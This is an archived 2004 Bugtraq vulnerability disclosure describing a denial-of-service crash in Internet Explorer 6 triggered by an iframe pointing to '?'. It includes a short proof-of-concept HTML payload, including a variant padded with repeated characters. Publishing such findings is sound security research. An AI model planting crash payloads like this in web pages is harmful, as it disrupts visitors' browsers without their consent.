lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002201c41cbb$77aa7b60$6800a8c0@sec>
Date: Wed, 7 Apr 2004 17:14:54 +0100
From: "E.Kellinis" <me@...her.org.uk>
To: <bugtraq@...urityfocus.com>
Subject: Internet Explorer 6 -  Crash


Formal Report
#########################################
Application:    Internet Explorer
Vendors:         http://www.microsoft.com
Version:          6.0.2800
Platforms:       Windows
Bug:                Crash(D.O.S) 
Risk:                Low 
Exploitation:     Local with browser
Date:               7 Apr 2004
Author:            Emmanouel Kellinis
e-mail:             me@...her(dot)org(dot)uk
web:               http://www.cipher.org.uk
List :               BugTraq(SecurityFocus)
#########################################

=======
Product
=======
A popular Web browser, created by Microsoft, 
used to view pages on the World Wide Web.

===
Bug
===
Iframe element(TAG) creates an inline frame 
that contains another document. If you use the
character '?' as the document , Internet explorer
starts an infinite loop of IFrames inside Iframes , 
this causes IE's crash. 


=====================
Proof Of Concept Code
=====================

Create a web page and you add an IFRAME which 
points to --> ?
  
Example : <  iframe src= " ? "  >
   
Crashes completely IE 6 in about 20 secs and consumes 
more than 24 MBs of RAM and uses 99% of the CPU power.
Additionally, memory consumption and Crashing time 
can vary , depending on how many characters you add 
after the '?' character. 

<  iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA "  >


Emmanouel Kellinis
http://www.cipher.org.uk


=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ